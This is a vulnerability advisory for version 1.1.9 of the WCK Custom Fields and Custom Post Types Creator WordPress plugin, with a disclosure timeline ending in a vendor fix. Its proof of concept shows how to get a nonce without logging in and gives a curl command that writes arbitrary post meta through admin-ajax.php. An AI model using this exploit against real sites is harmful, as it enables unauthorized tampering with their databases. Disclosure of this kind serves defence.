WCK - Custom Fields and Custom Post Types Creator [Unauthorized DB Access]
WCK - Custom Fields and Custom Post Types Creator plugin for WordPress suffers from a Unauthorized DB Access vulnerability
Description
WordPress plugin WCK - Custom Fields and Custom Post Types Creator suffers from unathorized DB access vulnerability. An attacker can exploit the wck_add_form{$this->args['meta_name']} and wck_add_meta{$this->args['meta_name']} actions to insert arbitrary data to database or update existing values.
If the attack is successful then the attacker can insert data or update values in postmeta DB table even without a valid acount, as these actions are available to anyone through the wp_ajax_nopriv actions.
PoC
First the attacker must acquire a nonce value for wck-add-meta action. This is possible by using the action action=wck_add_formwck_cfc_fields because action wck_add_form{$this->args['meta_name']} is available to non-privileged users: <a href="http://example.com/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields">http://example.com/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields</a>
The response is a form that contains the nonce in .button-primary link, eg:
<a href="javascript:void(0)" class="button-primary"
onclick="addMeta('', '', 'f76ddf7b16')">
<span>Add Entry</span>
</a>
With this nonce the attacker can exploit the wck_add_meta{$this->args['meta_name']} action to modify post meta directly in DB, eg:
POST_ID=1
ACTION=wck_add_metawck_cfc_args
META_KEY="_meta_key_"
META_VALUE="pwnd"
NONCE="f76ddf7b16"
curl -d "_wpnonce=${NONCE}&action=${ACTION}&meta=${META_KEY}&values=${META_VALUE}&id=${POST_ID}" \
"http://example.com/wp-admin/admin-ajax.php"
- 3 February 2016
- Pan Vag
- www.cozmoslabs.com
- wordpress.org
- 1.1.9
- WordPress 4.4.2
- 2016-02-04:
Vendor notified via support forums in WordPress.org - 2016-02-05:
Vendor responded - 2016-02-05:
Send issue details to vendor - 2016-02-06:
Requested CVE ID - 2016-02-09:
Vendor released v1.2.0 which resolves this issue